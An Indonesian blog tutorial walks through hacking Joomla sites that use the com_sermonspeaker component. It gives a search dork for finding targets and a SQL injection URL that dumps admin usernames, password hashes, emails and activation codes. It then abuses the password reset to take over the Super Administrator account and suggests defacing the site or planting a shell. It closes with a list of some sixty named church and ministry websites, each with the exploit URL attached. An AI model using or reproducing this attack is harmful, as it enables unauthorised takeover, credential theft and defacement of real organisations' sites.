Step by step Exploit Joomla

Advertisemen
Oke langsung ke pembahasan aja yah

==================================

Code:
* Dork : inurl:option=com_sermonspeaker

Code:
* Exploit : /index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
===================================

1. Pertama cari dulu target di google.
Dork : inurl:option=com_sermonspeaker

2. Jika sudah ketemu tergetnya silahkan mencoba memasang exploit. Kali ini target kita adalah http://loichung.com
[Image: 1.jpg]

3. Langsung pasang exploit nya
Code:
/index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

[Image: 2-1.jpg]

4. Wah username, email, sama passwordnya keluar semua tuh. Buat yang mau encrypt password nya silahkan. Tapi kali ini kita akan menggunakan tekhnik lupa password.

Code:
/index.php?option=com_user&view=reset

Tinggal masukin email admin nya
[Image: 3.jpg]

5. Terus tekan submit dan akan muncul seperti ini
[Image: 4.jpg]

Wah minta activation code, harus gimana nih ?

Tenang aja monggo kita cari aktivasinya
Tambahkan ,0x3a,activation setelah 0x3a,email jadinya seperti ini

Code:
/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email,0x3a,activation)/**/from/**/jos_users/**/

Jika kita sudah menambahkan ,0x3a,activation setelah 0x3a,email maka akan muncul seperti ini

[Image: 5.jpg]

Wah activation code nya keluar tuh sekarang tinggal kita paste aja activation code nya

[Image: 6.jpg]

6. Sekarang tekan lagi submit maka akan muncul seperti ini
[Image: 7.jpg]

Nah sekarang silahkan masukkan password baru sesuai keinginan kita. Setelah itu tekan submit lagi

[Image: 8.jpg]

7. Sekarang kita login as admin melalui
Code:
http://[site]/[pacth]/administrator

[Image: 9.jpg]

Masukkan username admin dan password admin.

[Image: 10.jpg]

Dan sekarang kita sudah berhasil login sebagai Super Administrator dan kita berhak melakukan apapun di site tersebut. Untuk selanjutnya silahkan anda lanjutkan.

Entah site itu mau anda
* Deface Indexnya
* Tanam shell
* Dll

Buat teman-teman yang mengalami kesulitan mendapatkan target ini saya kasih target + exploit nya
Code:
http://www.rlwministry.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://gracebaptistabilene.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.beaconchurch.co.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://thehouseofprayeratbluewateroaks.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://newburghumc.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.wellingtonpc.co.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://sermons.thesteeplechurch.org.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://cornerstonechurchedh.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.wgic.org/i/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.worldprayerministriesinc.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://yourcbcfamily.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.midacts.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.gileadbaptist.net/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://wesleyssi.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.fbclansing.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.fbcenterprise.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://tsawwassenalliance.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://newfaithchurchinsacultexas.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.cabotumc.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.centerpointnh.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.monfmc.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.kruger.org.au/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.firstlyman.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://hccpromiseland.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.fmchurch.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.baysidebaptist.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://rockfordreformedchurch.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://nettleschurch.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://pbsda.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://mycalvarybc.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://columbusbiblechurch.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://victorybyfaith.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.cardiffcitychurch.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.nmccenter.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.rlwministry.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://simplemethods.org/deberrybaptistchurch/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.firstfree.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.stjohns-port.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.gladtidings.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.immanuelchurch.org.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.nlcm.org.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.redeemerjamison.org/joomla/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.columbusbiblechurch.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.wotfc.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://mycalvarybc.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://trpc.org.au/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://gtaustin.net/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.communityofhopechurch.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.cicfamily.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.redruthbaptist.org.uk/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://southgrandvillechurch.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.wotfc.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://iepvitarte.org/demo/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://ijsselmuiden.gkv.nl/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://adventistasberriensprings.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.fcbrackenfell.co.za/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.acude.cc/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://loichung.com/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.elim.fo/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.cariciasparaelalma.org/cr/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

http://www.kcccph.org/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
Advertisemen

Disclaimer: Gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami disini.
Related Posts
Disqus Comments
© Copyright 2017 Uphik Lamers - All Rights Reserved - Created By ads Diberdayakan oleh Blogger